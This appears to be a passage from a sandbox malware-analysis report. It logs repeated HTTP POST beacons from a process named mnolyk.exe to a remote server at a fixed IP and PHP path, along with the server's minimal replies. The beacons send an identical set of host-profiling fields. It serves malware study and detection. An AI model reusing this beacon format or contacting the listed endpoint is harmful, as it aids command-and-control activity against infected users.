Feb 7, 2023 20:02:20.399569988 CET	456	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:02:20 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
316	192.168.2.6	50039	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:02:20.584894896 CET	457	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:02:20.648364067 CET	457	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:02:20 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
317	192.168.2.6	50040	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:02:20.818779945 CET	458	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:02:20.881772995 CET	458	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:02:20 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
318	192.168.2.6	50041	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:02:21.067703009 CET	459	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:02:21.132908106 CET	459	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:02:21 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
319	192.168.2.6	50042	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:02:21.298484087 CET	460	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:02:21.361246109 CET	460	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:02:21 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
32	192.168.2.6	49750	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:00:58.621944904 CET	137	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:00:58.685926914 CET	137	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:00:58 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
320	192.168.2.6	50043	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:02:21.535773993 CET	461	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:02:21.598689079 CET	461	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:02:21 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
321	192.168.2.6	50044	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:02:21.772716045 CET	462	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:02:21.835486889 CET	462	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:02:21 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
322	192.168.2.6	50045	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:02:22.023469925 CET	463	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:02:22.087369919 CET	463	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:02:22 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
323	192.168.2.6	50046	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:02:22.274271011 CET	464	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:02:22.339755058 CET	464	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:02:22 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
324	192.168.2.6	50047	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:02:22.518279076 CET	465	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:02:22.581559896 CET	465	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:02:22 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
325	192.168.2.6	50048	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:02:22.753627062 CET	466	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:02:22.817059040 CET	466	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:02:22 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
326	192.168.2.6	50049	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:02:23.003140926 CET	467	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:02:23.067365885 CET	467	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:02:23 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
327	192.168.2.6	50050	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:02:23.248250008 CET	468	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:02:23.312478065 CET	468	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:02:23 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
328	192.168.2.6	50051	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:02:23.494294882 CET	469	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:02:23.559998035 CET	469	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:02:23 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
329	192.168.2.6	50052	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:02:23.740042925 CET	470	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:02:23.802834988 CET	470	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:02:23 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
33	192.168.2.6	49751	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:00:58.872163057 CET	138	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:00:58.934767008 CET	138	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:00:58 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
330	192.168.2.6	50053	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:02:24.008848906 CET	471	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:02:24.073893070 CET	471	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:02:24 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
331	192.168.2.6	50054	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:02:24.270996094 CET	472	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:02:24.336196899 CET	472	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:02:24 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
332	192.168.2.6	50055	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:02:24.503968954 CET	473	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:02:24.568763018 CET	473	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:02:24 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
333	192.168.2.6	50056	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:02:24.870217085 CET	474	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:02:24.933780909 CET	474	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:02:24 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
334	192.168.2.6	50057	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:02:25.359863043 CET	475	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:02:25.425580025 CET	475	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:02:25 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
335	192.168.2.6	50058	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
